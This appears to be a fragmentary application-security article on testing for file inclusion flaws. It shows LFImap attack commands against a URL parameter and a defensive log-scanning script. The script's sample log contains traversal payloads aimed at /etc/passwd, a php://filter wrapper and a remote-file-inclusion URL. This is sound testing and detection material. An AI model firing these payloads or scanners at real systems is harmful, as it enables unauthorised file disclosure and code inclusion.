Application Security Testing for File Inclusion vulnerabilities.
This article describes how to test an application for Local and Remote File Inclusion vulnerabilities. The advice in this article is based on:
- OWASP Web Security Testing Guide
- OWASP Application Security Verification Standard
- Bug bounty reports
- My own experience.
Tools, with basic usage, and the wordlists used for LFI and RFI detection.
- LFImap — LFI & RFI discovery and exploitation tool.
At its current development stage, I suggest using ffuf with custom wordlists for RFI and LFI detection instead. The project is still in pre-alpha, but the developer states that release 1.0 is coming soon, so it is worth keeping an eye on.
# SINGLE URL (PWN - injection place)
python lfimap.py -U "https://afine.com/converter?filename=PWN" -a
# MULTIPLE URLS (each URL must have PWN specified)
python lfimap.py -F urls.txt -a
I have described how to use the above automatic scanners in another article:
Infrastructure testing with MSF
Penetration testing of the corporate network using Metasploit
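As an added defensive counterpart to the scanners above (this is example code written for this article's topic, not code from the article, from LFImap or from ffuf), the following Python script scans web-server access-log lines for the same LFI/RFI indicators the wordlists probe for: directory traversal (including double URL encoding), remote URLs, and stream-wrapper schemes. The log lines, IP addresses and the /converter?filename= parameter are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (combined log format), not taken from the article.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2024:10:00:01 +0000] "GET /converter?filename=report.pdf HTTP/1.1" 200 512
203.0.113.7 - - [10/Jan/2024:10:00:02 +0000] "GET /converter?filename=../../../../etc/passwd HTTP/1.1" 200 1024
203.0.113.7 - - [10/Jan/2024:10:00:03 +0000] "GET /converter?filename=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1024
203.0.113.9 - - [10/Jan/2024:10:00:04 +0000] "GET /converter?filename=http://203.0.113.99/x.txt HTTP/1.1" 500 88
203.0.113.9 - - [10/Jan/2024:10:00:05 +0000] "GET /converter?filename=php://filter/resource=index.php HTTP/1.1" 200 4096
"""
# Request line between the quotes: method, path with query string, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Indicators matched against the fully decoded parameter value.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')                      # ../ or ..\ segment
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)                 # RFI: remote host
WRAPPER_RE = re.compile(r'^(php|file|data|phar|zip)://', re.IGNORECASE)   # LFI via stream wrapper

def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads (e.g. %252F) are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value: str):
    """Return 'rfi-remote-url', 'lfi-wrapper', 'lfi-traversal', or None when benign."""
    v = fully_decode(value)
    if REMOTE_RE.search(v):
        return "rfi-remote-url"
    if WRAPPER_RE.search(v):
        return "lfi-wrapper"
    if TRAVERSAL_RE.search(v) or "\x00" in v:   # null byte: path-truncation attempt
        return "lfi-traversal"
    return None

def scan_log(text: str):
    findings = []  # one dict per suspicious query parameter found in the log text
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, raw in parse_qsl(parts.query, keep_blank_values=True):  # decodes one layer
            kind = classify(raw)
            if kind:
                findings.append({"ip": line.split()[0], "param": name, "kind": kind, "value": fully_decode(raw)})
    return findings
```

Run it against real access logs by feeding the file contents to scan_log(); hits on the same parameter from one source IP in quick succession are the fuzzing pattern the tools above produce.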
BURP SUITE PRO EXTENSIONS
# EXAMPLE OUTPUT FROM THE ABOVE SCREENSHOT:
-X "GET" -H "/test/FUZZ HTTP/1.1" -H "Host: afine.com" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36" -H "Accept-Encoding: gzip, deflate" -H "Connection: close"